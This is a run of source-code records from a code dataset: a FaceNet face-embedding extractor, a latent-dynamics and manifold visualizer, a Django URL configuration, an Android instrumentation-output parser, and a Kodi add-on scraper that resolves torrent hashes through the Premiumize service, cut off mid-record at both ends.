tf.get_default_graph().get_tensor_by_name('embeddings:0')\n self.phase_train_placeholder = tf.get_default_graph().get_tensor_by_name('phase_train:0')\n \n def extract(self, img_path):\n img = cv.imread(img_path, 1) # RGB image\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n resized_img = cv.resize(img, self.img_size, interpolation=cv.INTER_AREA)\n prewithened = facenet.prewhiten(resized_img)\n\n # Get Embedding Here\n reshaped_img = prewithened.reshape(-1, self.img_size[0], self.img_size[1], 3)\n feed_dict = {self.images_placeholder:reshaped_img, self.phase_train_placeholder:False}\n features = self.sess.run(self.embeddings_placeholder, feed_dict=feed_dict)\n return features[0]\n \n def extract_image(self, img):\n resized_img = cv.resize(img, self.img_size, interpolation=cv.INTER_AREA)\n prewithened = facenet.prewhiten(resized_img)\n\n # Get Embedding Here\n reshaped_img = prewithened.reshape(-1, self.img_size[0], self.img_size[1], 3)\n feed_dict = {self.images_placeholder:reshaped_img, self.phase_train_placeholder:False}\n features = self.sess.run(self.embeddings_placeholder, feed_dict=feed_dict)\n return features[0]\n\n def _image_to_embedding_batch(self, img_path_list):\n images = []\n for img_path in img_path_list:\n img = cv.imread(img_path, 1) # RGB image\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n resized_img = cv.resize(img, self.img_size, interpolation=cv.INTER_AREA)\n prewithened = facenet.prewhiten(resized_img)\n images.append(prewithened)\n \n images = np.array(images)\n reshaped_images = images.reshape(-1, self.img_size[0], self.img_size[1], 3)\n feed_dict = {self.images_placeholder:reshaped_images, self.phase_train_placeholder:False}\n embedding_result = self.sess.run(self.embeddings_placeholder, feed_dict=feed_dict)\n return embedding_result\n \n def close_session(self):\n self.sess.close()\n tf.reset_default_graph()","sub_path":"src/main/python/app/reidentification/feature_extractor/facenet_embedding.py","file_name":"facenet_embedding.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"99536055","text":"# matplotlib.use(\"TKAgg\")\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport plotly.express as px\nimport scipy\nfrom matplotlib import style\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.sparse import csgraph\nfrom sklearn import neighbors\nfrom sklearn.neighbors import radius_neighbors_graph\n\n# plt.switch_backend(\"TkAgg\")\n\n\nnp.set_printoptions(\n suppress=True, precision=3,\n)\nstyle.use(\"ggplot\")\n\n\ndef DisplayLatentDynamics(latent):\n \"\"\"Visualize the dynamics of combination of latents \n Args:\n latent(tensor): Each point in the list is latent's state at the end of a sequence of each batch.\n Latent shape (batch_size, latent_dim)\n Return: Relative plots of latent unit activations\n Usage:\n ======\n DisplayLatentDynamics(latent)\n \"\"\"\n\n latents = {}\n latents.fromkeys(list(range(latent.shape[1])))\n for i in range(latent.shape[1]):\n latents[f\"{i}\"] = latent[:, i].cpu().detach().numpy()\n fig = px.scatter_matrix(latents)\n fig.update_layout(\n autosize=False, width=1600, height=1000,\n )\n return fig.show()\n\n\nclass DirectedNetwork(object):\n def __init__(self):\n super().__init__()\n pass\n\n def show(self, states, weight, fig):\n \"\"\"\n\n :param states: list - Hidden states\n :param weight: numpy.ndarray - Array of connection weights\n :param fig: Figure number\n\n :return: boolean: Figure close status : Open - False/ Close - True\n\n \"\"\"\n np.random.seed(70001)\n # Set up hidden states\n state_dict = {i: states[i] for i in range(0, len(states))}\n\n # Set up links\n self_connections = [weight[i][i] for i in range(len(weight))]\n\n # Intialize graph\n G = nx.from_numpy_matrix(\n weight, create_using=nx.MultiDiGraph, parallel_edges=True\n )\n\n edge_colors = weight.tolist()\n edge_colors_ = [float(\"%.8f\" % j) for i in edge_colors for j in i]\n\n # Set up nodes\n neuron_color = [state_dict.get(node, 0.25) for node in G.nodes()]\n\n # Set colrmap\n vmin = np.min(states)\n vmax = np.max(states)\n cmap = plt.cm.coolwarm\n edge_cmap = plt.cm.Spectral\n nx.draw(\n G,\n with_labels=True,\n cmap=cmap,\n node_color=neuron_color,\n node_size=200,\n linewidths=5,\n edge_color=edge_colors_,\n edge_cmap=edge_cmap,\n font_size=10,\n connectionstyle=\"arc3, rad=0.3\",\n )\n\n sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin, vmax=vmax))\n sm.set_array([])\n cbar = plt.colorbar(sm, orientation=\"vertical\", pad=0.1)\n\n # State of streaming plot\n if plt.fignum_exists(fig.number):\n fig.canvas.draw()\n fig.canvas.flush_events()\n fig.clear()\n\n # Plot is not closed\n return False\n else:\n return True\n\n\nclass LocalLinearEmbedding(object):\n def __init__(self):\n super(LocalLinearEmbedding, self).__init__()\n pass\n\n def local_linear_embedding(self, X, d, k, alpha=0.1):\n \"\"\"\n Local Linear Embeddings\n\n :param X: numpy.ndarray - input data matrix mxD , m data points with D dimensions\n :param d: int - target dimensions\n :param k: int -number of neighbors\n :param alpha: float - Tikhonov coefficient regularization\n\n :return Y: numpy.ndarray - matrix m row, d attributes are reduced dimensional\n \"\"\"\n # Find the nearest neighbor\n x_neighbors = neighbors.kneighbors_graph(X, n_neighbors=k)\n\n m = len(X)\n\n # Init weights\n W = np.zeros(shape=(m, m))\n\n for i, nbor_row in enumerate(x_neighbors):\n # Get the kneighboring indexes of i\n k_indices = nbor_row.indices\n\n # Calculate the Z matrix\n Z_i = X[k_indices] - X[i]\n\n # Calculate the matrix G\n G_i = Z_i @ Z_i.T\n\n # Weights between neigbors\n w_i = scipy.linalg.pinv(G_i + alpha * np.eye(k)) @ np.ones(k)\n W[i, k_indices] = w_i / w_i.sum()\n\n # Calculate matrix M\n M = (np.eye(m) - W).T @ (np.eye(m) - W)\n M = M.T\n\n # Calculate Eigen vectors\n _, vectors = scipy.linalg.eigh(M, eigvals=(0, d))\n\n # Return the vectors and discard the first column of the matrix\n return vectors[:, 1:]\n\n def show(self, pc, fig2):\n \"\"\"[summary]\n\n Args:\n pc ([type]): [description]\n fig2 ([type]): [description]\n \"\"\"\n\n ax = Axes3D(fig2)\n f = ax.scatter(pc[:, 0], pc[:, 1], pc[:, 2], s=40, c=pc[:, 2])\n for i in range(len(pc)):\n ax.plot3D(\n pc[i:, 0],\n pc[i:, 1],\n pc[i:, 2],\n alpha=i / len(pc),\n color=\"red\",\n linewidth=1,\n )\n fig2.colorbar(f)\n # plt.pause(0.0001)\n # State of streaming plot\n if plt.fignum_exists(fig2.number):\n fig2.canvas.draw()\n fig2.canvas.flush_events()\n fig2.clear()\n\n # Plot is not closed\n return False\n else:\n return True\n\n\nclass SpectralEmbedding(object):\n def __init__(self):\n super(SpectralEmbedding, self).__init__()\n pass\n\n def spectral_embedding(self, X, rad):\n \"\"\"\n Spectral Clustering\n\n :param X: numpy.ndarray - input data matrix mxn , m data points with n dimensions\n :param rad: float -radius for neighbor search\n\n :return Y: numpy.ndarray - matrix m row, d attributes are reduced dimensional\n \"\"\"\n # Get the adjacency matrix/nearest neighbor graph; neighbors within the radius of 0.4\n A = radius_neighbors_graph(\n X.T,\n rad,\n mode=\"distance\",\n metric=\"minkowski\",\n p=2,\n metric_params=None,\n include_self=False,\n )\n A = A.toarray()\n\n # Find the laplacian of the neighbour graph\n # L = D - A ; where D is the diagonal degree matrix\n L = csgraph.laplacian(A, normed=False)\n # Embedd the data points i low dimension using the Eigen values/vectos\n # of the laplacian graph to get the most optimal partition of the graph\n eigval, eigvec = np.linalg.eig(L)\n # the second smallest eigenvalue represents sparsest cut of the graph.\n np.where(eigval == np.partition(eigval, 1)[1])\n # Partition the graph using the smallest eigen value\n y_spec = eigvec[:, 1].copy()\n y_spec[y_spec < 0] = 0\n y_spec[y_spec > 0] = 1\n return y_spec\n\n def show(self, X, spec_embed, fig3):\n \"\"\"[summary]\n\n Args:\n X ([type]): [description]\n spec_embed ([type]): [description]\n fig3 ([type]): [description]\n\n Returns:\n [type]: [description]\n \"\"\"\n\n ax3 = fig3.add_subplot()\n X = X.T\n fi = ax3.scatter(x=X[:, 0], y=X[:, 1], c=spec_embed, s=30, cmap=plt.cm.Spectral)\n for i in range(len(X[:, 0])):\n ax3.annotate(i, (X[:, 0][i], X[:, 1][i]))\n fig3.colorbar(fi)\n\n # State of streaming plot\n if plt.fignum_exists(fig3.number):\n fig3.canvas.draw()\n fig3.canvas.flush_events()\n fig3.clear()\n\n # Plot is not closed\n return False\n else:\n return True\n\n\nif __name__ == \"__main__\":\n # create the coordinates\n numebr_of_points = 21\n small_range = -1.0\n large_range = 1.0\n\n xcoordinates = np.linspace(small_range, large_range, num=numebr_of_points)\n ycoordinates = np.linspace(small_range, large_range, num=numebr_of_points)\n\n xcoord_mesh, ycoord_mesh = np.meshgrid(xcoordinates, ycoordinates)\n inds = np.array(range(numebr_of_points ** 2))\n s1 = xcoord_mesh.ravel()[inds]\n s2 = ycoord_mesh.ravel()[inds]\n coordinate = np.c_[s1, s2]\n print(\n \"From \",\n small_range,\n \" to \",\n large_range,\n \" with \",\n numebr_of_points,\n \" total number of coordinate: \",\n numebr_of_points ** 2,\n )\n\n\nclass Network:\n def __init__(self, activity, weights):\n pass\n\n def show(self):\n fig = None\n return fig\n\n\nclass ShowManifold:\n def __init__(self, inputs, manifold):\n pass\n\n def show(self):\n fig = None\n return fig\n","sub_path":"traja/models/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":8609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"115417043","text":"\"\"\"faculty URL Configuration\"\"\"\r\nfrom django.urls import path\r\nfrom . import views\r\nurlpatterns = [\r\n path('',views.faculty,name='faculty'),\r\n path('flogin',views.flogin,name='flogin'),\r\n path('home',views.home,name='home'),\r\n path('logout',views.logout,name='logout'),\r\n path('account',views.account,name='account'),\r\n path('create_account',views.create_account,name='create_account'),\r\n path('marks',views.marks,name='marks'),\r\n path('chk_marks',views.chk_marks,name='chk_marks'),\r\n path('updated_marks',views.updated_marks,name='updated_marks'),\r\n]\r\n","sub_path":"faculty/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"596465150","text":"import logging\n\nfrom abc import abstractmethod, ABC\nfrom typing import List, Optional, Any\n\nfrom .reporting import TestRunListener\nfrom .timing import StopWatch\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\n\n\nclass LineParser(ABC):\n \"\"\"\n Basic line-by-line parser interface\n \"\"\"\n\n @abstractmethod\n def parse_line(self, line: str) -> None:\n \"\"\"\n Parse the given line\n :param line: text of line to parse\n :return:\n \"\"\"\n\n\nclass InstrumentationOutputParser(LineParser):\n \"\"\"\n Inspired by:\n https://android.googlesource.com/platform/tools/base/+/master/ddmlib/src/main/java/com/android/ddmlib/testrunner/InstrumentationResultParser.java\n\n Parses the 'raw output mode' results of an instrumentation test run from shell and informs a\n TestRunListener of the results.\n\n Expects the following output:\n\n If fatal error occurred when attempting to run the tests:\n\n .. code-block:: bash\n\n INSTRUMENTATION_STATUS: Error=error Message\n INSTRUMENTATION_FAILED:\n\n or\n\n .. code-block:: bash\n\n INSTRUMENTATION_RESULT: shortMsg=error Message\n\n Otherwise, expect a series of test results, each one containing a set of status key/value\n pairs, delimited by a start(1)/pass(0)/fail(-2)/error(-1) status code result. At end of test\n run, expects that the elapsed test time in seconds will be displayed\n\n For example:\n\n .. code-block:: bash\n\n INSTRUMENTATION_STATUS: id=...TestRunner\n INSTRUMENTATION_STATUS: class=com.foo.FooTest\n INSTRUMENTATION_STATUS: test=testFoo\n INSTRUMENTATION_STATUS: numtests=2\n INSTRUMENTATION_STATUS: stack=com.foo.FooTest#testFoo:312\n com.foo.X\n INSTRUMENTATION_STATUS_CODE: -2\n ...\n\n Time: X\n\n Note that the \"value\" portion of the key-value pair may wrap over several text lines\n \"\"\"\n CODE_START = 1\n CODE_IN_PROGRESS = 2\n CODE_PASS = 0\n CODE_ERROR = -1\n CODE_FAIL = -2\n CODE_SKIPPED = -3\n # if a junit assumption-failure-exception is raised, it means test should be counted as skipped; code for this is\n # -4:\n CODE_ASSUMPTION_VIOLATION = -4\n\n # line control prefix\n PREFIX_STATUS = \"INSTRUMENTATION_STATUS: \"\n PREFIX_STATUS_CODE = \"INSTRUMENTATION_STATUS_CODE: \"\n PREFIX_FAILED = \"INSTRUMENTATION_FAILED: \"\n PREFIX_CODE = \"INSTRUMENTATION_CODE: \"\n PREFIX_RESULT = \"INSTRUMENTATION_RESULT: \"\n PREFIX_TIME = \"Time: \"\n\n FAILURE_MSG = \"FAILURES!!!\"\n\n # instrumentation status keys\n KEY_TEST = \"test\"\n KEY_CLASS = \"class\"\n KEY_STACK = \"stack\"\n KEY_STREAM = \"stream\"\n KEY_NUM_TESTS = \"numtests\"\n KEY_ERROR = \"Error\"\n KEY_SHORT_MSG = \"shortMsg\"\n # unused keys\n KEY_ID = \"id\"\n KEY_CURRENT = \"current\"\n\n KNOWN_KEYS = {\n KEY_TEST,\n KEY_CLASS,\n KEY_STACK,\n KEY_STREAM,\n KEY_NUM_TESTS,\n KEY_ERROR,\n KEY_SHORT_MSG,\n KEY_ID,\n KEY_CURRENT\n }\n\n UNKNOWN_TEST_CLASS = \"<>\"\n UNKNOWN_TEST_NAME = \"<>\"\n MISSING_STACK_TRACE = \"<>\"\n\n class TestParsingResult:\n \"\"\"Holds information about current test while parsing\"\"\"\n def __init__(self) -> None:\n self.code: Optional[int] = None\n self.test_name: Optional[str] = None\n self.test_class: Optional[str] = None\n self.num_tests: Optional[int] = None\n self.stack_trace: Optional[str] = None\n self.stream: Optional[str] = None\n\n def is_complete(self) -> bool:\n return (self.code is not None\n and self.test_name is not None\n and self.test_class is not None)\n\n def __repr__(self) -> str:\n return self.__class__.__name__ + str(self.__dict__)\n\n def __init__(self, test_run_listener: Optional[TestRunListener] = None,\n include_instrumentation_output: bool = False) -> None:\n super().__init__()\n self._reporters: List[TestRunListener] = [test_run_listener] if test_run_listener else []\n self._execution_listeners: List[StopWatch] = []\n self._current_test: Optional[InstrumentationOutputParser.TestParsingResult] = None\n self._last_test: Optional[InstrumentationOutputParser.TestParsingResult] = None\n self._in_result_key_value: bool = False\n self._current_key: Optional[str] = None\n self._current_value: Optional[List[str]] = None\n\n # either we got INSTRUMENTATION_CODE or INSTRUMENTATION_FAILED signaling end of run\n self._test_run_finished: bool = False\n self._reported_any_results: bool = False\n self._reported_test_run_fail: bool = False\n self._got_failure_msg: bool = False\n\n self._num_tests_expected: int = 0\n self._num_tests_run: int = 0\n\n # todo: currently unused. However, android studio reports this as test run duration.\n self._test_run_time: float = 0\n\n self._include_instrumentation_output = include_instrumentation_output\n self._instrumentation_text = \"\"\n\n def __enter__(self) -> \"InstrumentationOutputParser\":\n return self\n\n def __exit__(self, *args: Any) -> None:\n self.close()\n\n @property\n def execution_time(self) -> float:\n return self._test_run_time\n\n @property\n def total_test_count(self) -> int:\n return self._num_tests_run\n\n @property\n def num_tests_expected(self) -> int:\n return self._num_tests_expected\n\n def add_listener(self, listener: TestRunListener) -> None:\n \"\"\"\n Add listener for test start/end as well as test status\n :param listener: listener to add\n \"\"\"\n self._reporters.append(listener)\n\n def add_test_execution_listener(self, listener: StopWatch) -> None:\n \"\"\"\n add an agent for this parser to use to mark the start and end of tests\n without need to listen for test status\n \"\"\"\n self._execution_listeners.append(listener)\n\n def parse_line(self, line: str) -> None:\n \"\"\"\n Entry point. Parses one line of output at a time.\n :param line: A single line of output (typically ending in '\\n', unless the end of output has been reached)\n \"\"\"\n if self._include_instrumentation_output:\n self._instrumentation_text += line + \"\\n\"\n if line.startswith(self.PREFIX_STATUS_CODE):\n self._finalize_current_key_value()\n self._in_result_key_value = False\n self._parse_status_code(line[len(self.PREFIX_STATUS_CODE):])\n elif line.startswith(self.PREFIX_STATUS):\n self._finalize_current_key_value()\n self._in_result_key_value = False\n self._parse_key_value(line[len(self.PREFIX_STATUS):])\n elif line.startswith(self.PREFIX_RESULT):\n self._finalize_current_key_value()\n self._in_result_key_value = True\n self._parse_key_value(line[len(self.PREFIX_RESULT):])\n elif line.startswith(self.PREFIX_FAILED) \\\n or line.startswith(self.PREFIX_CODE):\n self._finalize_current_key_value()\n self._in_result_key_value = False\n # at close() we'll report the error\n self._test_run_finished = True\n elif line.startswith(self.PREFIX_TIME):\n self._parse_time(line[len(self.PREFIX_TIME):])\n else:\n # Handles the case where the instrumentation output itself fails. In that case it only outputs:\n # INSTRUMENTATION_RESULT: stream=...\n # ...\n # FAILURES!!!\n # Tests run: 0, Failures: x\n # INSTRUMENTATION_CODE: -1\n if not self._got_failure_msg and line.startswith(self.FAILURE_MSG):\n self._got_failure_msg = True\n # continuation of value from previous status\n if self._current_value is not None:\n self._current_value.append(line)\n elif line.strip():\n log.debug(\"Unrecognized line: %s\", line)\n\n def _parse_status_code(self, line: str) -> None:\n \"\"\"\n Parses content of line after \"INSTRUMENTATION_STATUS_CODE: \"\n \"\"\"\n test = self._get_current_test()\n test_class = test.test_class or self.UNKNOWN_TEST_CLASS\n test_name = test.test_name or self.UNKNOWN_TEST_NAME\n try:\n test.code = int(line.strip())\n except ValueError:\n log.warning(\"Expected int status code, received: %s\", line)\n test.code = self.CODE_ERROR\n\n if test.code != self.CODE_IN_PROGRESS:\n # end of test result bundle -- either test starting or ending\n self._report_result(test)\n self._last_test = self._current_test\n self._current_test = None\n elif test.code == self.CODE_START:\n # mark start of next test\n for listener in self._execution_listeners:\n listener.mark_start(\".\".join([test_class, test_name]))\n else:\n for listener in self._execution_listeners:\n listener.mark_end(\".\".join([test_class, test_name]))\n\n def _parse_key_value(self, line: str) -> None:\n \"\"\"\n Parses line format key=value (after \"INSTRUMENTATION_STATUS: \" or \"INSTRUMENTATION_RESULT: \")\n \"\"\"\n key_val = line.split('=', 1)\n if len(key_val) == 2:\n self._current_key = key_val[0].strip()\n self._current_value = [key_val[1]]\n else:\n log.warning(\"Expected key=value, got: %s\", line)\n\n def _parse_time(self, line: str) -> None:\n \"\"\"\n Parses content of line after \"Time: \"\n \"\"\"\n try:\n self._test_run_time = float(line)\n except ValueError:\n log.warning(\"Unexpected time format: %s\", line)\n\n def _get_current_test(self) -> TestParsingResult: # noqa: https://github.com/PyCQA/pyflakes/issues/427\n \"\"\"\n :return: TestParsingResult for the currently running test, creating one if none exists\n \"\"\"\n current_test = self._current_test or self.TestParsingResult()\n if not self._current_test:\n self._current_test = current_test\n return current_test\n\n def _finalize_current_key_value(self) -> None:\n \"\"\"\n For key-value lines, the value may consist of multiple lines of output. When we see a key=value line, all\n following lines will be added to the value until we see another known prefix. Once we hit a known prefix, this\n method is called to finalize the value and do some action according to the key: report a test result, record\n some property of the test, etc.\n \"\"\"\n if self._current_key is not None and self._current_value is not None:\n value = ''.join(self._current_value)\n\n if self._in_result_key_value:\n if self._current_key not in self.KNOWN_KEYS:\n # todo: bundle key values?\n pass\n elif self._current_key == self.KEY_SHORT_MSG:\n # todo: collect more info? long_msg?\n self._report_test_run_failed(\"Instrumentation run failed due to '%s'\" % value)\n else:\n test = self._get_current_test()\n\n if self._current_key == self.KEY_CLASS:\n test.test_class = value.strip()\n elif self._current_key == self.KEY_TEST:\n test.test_name = value.strip()\n elif self._current_key == self.KEY_NUM_TESTS:\n try:\n test.num_tests = int(value.strip())\n except ValueError:\n log.warning(\"Unexpected number of tests, received: %s\", value)\n elif self._current_key == self.KEY_ERROR:\n self._report_test_run_failed(value)\n elif self._current_key == self.KEY_STACK:\n test.stack_trace = '\\n'.join(self._current_value)\n elif self._current_key == self.KEY_STREAM:\n test.stream = value\n elif self._current_key not in self.KNOWN_KEYS:\n # todo: test metrics?\n pass\n\n self._current_key = None\n self._current_value = None\n\n def _report_result(self, test: TestParsingResult) -> None:\n \"\"\"\n Reports the given TestParsingResult to the TestRunListener (test starting or test ending).\n :param test: the TestParsingResult that should be reported\n \"\"\"\n if not test.is_complete():\n log.warning(\"Invalid instrumentation status bundle: %s\", test)\n return\n\n if not self._reported_any_results and test.num_tests is not None:\n self._num_tests_expected = test.num_tests\n self._reported_any_results = True\n\n test_class = test.test_class or self.UNKNOWN_TEST_CLASS\n test_name = test.test_name or self.UNKNOWN_TEST_NAME\n\n if test.code == self.CODE_START:\n for reporter in self._reporters:\n reporter.test_started(test_class, test_name)\n return\n\n self._num_tests_run += 1\n if test.code == self.CODE_FAIL or test.code == self.CODE_ERROR:\n for reporter in self._reporters:\n reporter.test_failed(test_class, test_name, test.stack_trace or self.MISSING_STACK_TRACE)\n else:\n if test.code == self.CODE_SKIPPED:\n for reporter in self._reporters:\n reporter.test_started(test_class, test_name)\n reporter.test_ignored(test_class, test_name)\n elif test.code == self.CODE_ASSUMPTION_VIOLATION:\n for reporter in self._reporters:\n reporter.test_assumption_failure(test_class, test_name, test.stack_trace or self.MISSING_STACK_TRACE)\n elif test.code != self.CODE_PASS:\n log.warning(\"Unknown status code %s. Stacktrace: %s\", test.code, test.stack_trace)\n for reporter in self._reporters:\n reporter.test_ended(test_class, test_name, instrumentation_output=self._instrumentation_text)\n self._instrumentation_text = \"\"\n\n def _report_test_run_failed(self, error_message: str) -> None:\n \"\"\"\n Reports a test run failure to the TestRunListener\n :param error_message: The error message to report\n \"\"\"\n log.info(\"Test run failed: %s\", error_message)\n if self._last_test and self._last_test.is_complete and self._last_test.code == self.CODE_START:\n test_class = self._last_test.test_class or self.UNKNOWN_TEST_CLASS\n test_name = self._last_test.test_name or self.UNKNOWN_TEST_NAME\n # got test start but not test stop - assume that test caused this and report as test failure\n # todo: get logs here?\n stack_trace = \"Test failed to run to completion. Reason: '%s'.\" \\\n \" Check device logcat for details.\" % error_message\n for reporter in self._reporters:\n reporter.test_failed(test_class, test_name, stack_trace)\n reporter.test_ended(test_class, test_name, instrumentation_output=self._instrumentation_text)\n self._instrumentation_text = \"\"\n\n for reporter in self._reporters:\n reporter.test_run_failed(error_message)\n self._reported_any_results = True\n self._reported_test_run_fail = True\n\n def close(self) -> None:\n \"\"\"\n Ensures that all expected tests have been run, or else fails the test run.\n \"\"\"\n if self._reported_test_run_fail:\n return\n if not self._reported_any_results and (not self._test_run_finished or self._got_failure_msg):\n self._report_test_run_failed(\"No test results, instrumentation may have failed\")\n elif self._num_tests_run < self._num_tests_expected:\n self._report_test_run_failed(\n \"Test run failed to complete.\"\n \" Expected %s tests, received %s\" % (self._num_tests_expected, self._num_tests_run))\n","sub_path":"orchestrator/src/androidtestorchestrator/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":16195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"628429810","text":"\"\"\"\n SALTS XBMC Addon\n Copyright (C) 2014 tknorris\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n\"\"\"\nimport re\nimport urllib\nimport urlparse\nimport xbmcgui\nfrom salts_lib import kodi\nfrom salts_lib import log_utils\nfrom salts_lib import scraper_utils\nfrom salts_lib import dom_parser\nfrom salts_lib.constants import FORCE_NO_MATCH\nfrom salts_lib.constants import VIDEO_TYPES\nfrom salts_lib.constants import QUALITIES\nfrom salts_lib.kodi import i18n\nimport scraper\n\nBASE_URL = 'premiumize.me'\nCHECKHASH_URL = '/api/torrent/checkhashes?'\nADD_URL = '/api/transfer/create?type=torrent'\nBROWSE_URL = '/api/torrent/browse?hash=%s'\nLIST_URL = '/api/transfer/list'\n\nBASE_UR2 = 'https://yts.ag'\nMOVIE_SEARCH_URL = '/api/v2/list_movies.json?query_term=%s&sort_by=seeders&order_by=desc'\nMOVIE_DETAILS_URL = '/api/v2/movie_details.json?movie_id=%s'\n\nBASE_URL3 = 'https://eztv.ag'\n\nMAGNET_LINK = 'magnet:?xt=urn:btih:%s'\nVIDEO_EXT = ['MKV', 'AVI', 'MP4']\nQUALITY_MAP = {'1080p': QUALITIES.HD1080, '720p': QUALITIES.HD720, '3D': QUALITIES.HD1080}\n\nclass Premiumize_Scraper(scraper.Scraper):\n base_url = BASE_URL\n movie_base_url = BASE_UR2\n tv_base_url = BASE_URL3\n\n def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):\n self.timeout = timeout\n if kodi.get_setting('%s-use_https' % (self.get_name())) == 'true':\n scheme = 'https'\n prefix = 'www'\n else:\n scheme = 'http'\n prefix = 'http'\n base_url = kodi.get_setting('%s-base_url' % (self.get_name()))\n self.base_url = scheme + '://' + prefix + '.' + base_url\n self.movie_base_url = kodi.get_setting('%s-base_url2' % (self.get_name()))\n self.tv_base_url = kodi.get_setting('%s-base_url3' % (self.get_name()))\n self.username = kodi.get_setting('%s-username' % (self.get_name()))\n self.password = kodi.get_setting('%s-password' % (self.get_name()))\n\n @classmethod\n def provides(cls):\n return frozenset([VIDEO_TYPES.MOVIE, VIDEO_TYPES.TVSHOW, VIDEO_TYPES.EPISODE])\n\n @classmethod\n def get_name(cls):\n return 'Premiumize.me'\n\n def resolve_link(self, link):\n query = urlparse.parse_qs(link)\n if 'hash_id' in query:\n hash_id = query['hash_id'][0].lower()\n if self.__add_torrent(hash_id):\n browse_url = BROWSE_URL % (hash_id)\n browse_url = urlparse.urljoin(self.base_url, browse_url)\n js_data = self._json_get(browse_url, cache_limit=0)\n if 'content' in js_data:\n videos = self.__get_videos(js_data['content'])\n \n if len(videos) > 1:\n result = xbmcgui.Dialog().select(i18n('choose_stream'), [video['label'] for video in videos])\n if result > -1:\n return videos[result]['url']\n elif videos:\n return videos[0]['url']\n \n def __add_torrent(self, hash_id):\n list_url = urlparse.urljoin(self.base_url, LIST_URL)\n js_data = self._json_get(list_url, cache_limit=0)\n if 'transfers' in js_data:\n for transfer in js_data['transfers']:\n if transfer['hash'].lower() == hash_id:\n return True\n \n add_url = urlparse.urljoin(self.base_url, ADD_URL)\n data = {'src': MAGNET_LINK % hash_id}\n js_data = self._json_get(add_url, data=data, cache_limit=0)\n if 'status' in js_data and js_data['status'] == 'success':\n return True\n else:\n return False\n \n def __get_videos(self, content):\n videos = []\n for key in content:\n item = content[key]\n if item['type'].lower() == 'dir':\n videos += self.__get_videos(item['children'])\n else:\n if item['ext'].upper() in VIDEO_EXT:\n label = '(%s) %s' % (scraper_utils.format_size(item['size'], 'B'), item['name'])\n video = {'label': label, 'url': item['url']}\n videos.append(video)\n if 'transcoded' in item and item['transcoded']:\n transcode = item['transcoded']\n if 'size' in transcode:\n label = '(%s) (Transcode) %s' % (scraper_utils.format_size(transcode['size'], 'B'), item['name'])\n else:\n label = '(Transcode) %s' % (item['name'])\n video = {'label': label, 'url': transcode['url']}\n videos.append(video)\n return videos\n\n def format_source_label(self, item):\n label = '[%s] %s' % (item['quality'], item['host'])\n if '3D' in item and item['3D']:\n label += ' (3D)'\n if 'size' in item:\n label += ' (%s)' % (item['size'])\n if 'extra' in item:\n label += ' [%s]' % (item['extra'])\n return label\n\n def get_sources(self, video):\n source_url = self.get_url(video)\n if source_url and source_url != FORCE_NO_MATCH:\n if video.video_type == VIDEO_TYPES.MOVIE:\n return self.__get_movie_sources(source_url)\n else:\n return self.__get_episode_sources(source_url, video)\n \n def __get_episode_sources(self, source_url, video):\n hosters = []\n links = self.__find_episode(source_url, video)\n if links:\n hash_data = self.__get_hash_data([link[0] for link in links])\n for link in links:\n try: status = hash_data['hashes'][link[0]]['status']\n except KeyError: status = ''\n if status.lower() == 'finished':\n stream_url = 'hash_id=%s' % (link[0])\n host = self._get_direct_hostname(stream_url)\n quality = scraper_utils.blog_get_quality(video, link[1], '')\n hoster = {'multi-part': False, 'class': self, 'views': None, 'url': stream_url, 'rating': None, 'host': host, 'quality': quality, 'direct': True}\n hoster['extra'] = link[1]\n hosters.append(hoster)\n return hosters\n \n def __get_movie_sources(self, source_url):\n hosters = []\n query = urlparse.parse_qs(urlparse.urlparse(source_url).query)\n if 'movie_id' in query:\n movie_id = query['movie_id']\n else:\n movie_id = self.__get_movie_id(source_url)\n \n if movie_id:\n details_url = MOVIE_DETAILS_URL % (movie_id[0])\n details_url = urlparse.urljoin(self.movie_base_url, details_url)\n detail_data = self._json_get(details_url, cache_limit=24)\n try: torrents = detail_data['data']['movie']['torrents']\n except KeyError: torrents = []\n try: hashes = [torrent['hash'].lower() for torrent in torrents]\n except KeyError: hashes = []\n hash_data = self.__get_hash_data(hashes)\n for torrent in torrents:\n hash_id = torrent['hash'].lower()\n try: status = hash_data['hashes'][hash_id]['status']\n except KeyError: status = ''\n if status.lower() == 'finished':\n stream_url = 'hash_id=%s' % (hash_id)\n host = self._get_direct_hostname(stream_url)\n quality = QUALITY_MAP.get(torrent['quality'], QUALITIES.HD720)\n hoster = {'multi-part': False, 'class': self, 'views': None, 'url': stream_url, 'rating': None, 'host': host, 'quality': quality, 'direct': True}\n if 'size_bytes' in torrent: hoster['size'] = scraper_utils.format_size(torrent['size_bytes'], 'B')\n if torrent['quality'] == '3D': hoster['3D'] = True\n hosters.append(hoster)\n return hosters\n \n def __get_movie_id(self, source_url):\n url = urlparse.urljoin(self.movie_base_url, source_url)\n html = self._http_get(url, cache_limit=24)\n return dom_parser.parse_dom(html, 'div', {'id': 'movie-info'}, ret='data-movie-id')\n\n def __get_hash_data(self, hashes):\n new_data = {}\n if hashes:\n check_url = CHECKHASH_URL + urllib.urlencode([('hashes[]', hashes)], doseq=True)\n check_url = urlparse.urljoin(self.base_url, check_url)\n new_data = hash_data = 